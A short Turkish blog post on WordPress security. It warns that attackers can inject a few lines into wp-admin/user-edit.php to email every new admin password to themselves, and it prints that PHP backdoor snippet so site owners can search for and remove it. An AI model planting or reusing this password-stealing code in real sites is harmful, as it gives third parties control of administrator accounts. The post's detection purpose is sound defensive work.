Web Site Güvenliği

Web Site Güvenliği

Wordpress user-edit.php Dosya Kontrolu

  Öncelikle bu açık diğer web site türlerinde de bulunur.Bu maddede sadece wordpress üzerindeki açığa değinicem ve açıktan korunma yöntemi hakkında bilgi vericem.Aslında bu bir açık sayılmaz site adminlerinin yeterince web programlama hakkında bilgi sahibi olmadıklarından kaynaklanan bir durumdur.Bazen gözden de kaçabilir, kontrol edilmesi unutulabilir.Sitemize daha önce bir saldırı düzenlenmiş ise veya yeni bir saldırı sırasında da olabilir, kötü niyetli kişiler tarafından wp-admin dizini aldında bulunan user-edit.php dosyasına eklenebilecek bir kaç satırlık kod ile her admin şifresi değiştirdiğinizde yeni şifreniz kodu yerleştiren kişiye gitmesi sağlanmaktadır.Yani şifreniz her durumda üçüncü şahısların eline geçmiş olucaktır.
      Bu açıktan korunmak için yapmanız gereken şey ise wp-admin dizini altında bulunan user-edit.php dosyasında aşağıda verdiğim zararlı kodun olup olmadığını aramak olucaktır.Eğer bu kod user-edit.php dosyanızda var ise kodun tamamını silebilir veya mail adresi kısmına kendi mail adresinizi yazabilirsiniz.


if($_POST['submit'])
{
$mail = "sizin mail adresiniz";  // buraya şifrenin geleceği mail adresi
$baslik = "Site Adresi : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUSET_URI'];
$mesaj = "Yenilenmis Sifre :" . $_POST['pass2'];
$func = @mail($mail, $baslik, $mesaj);
}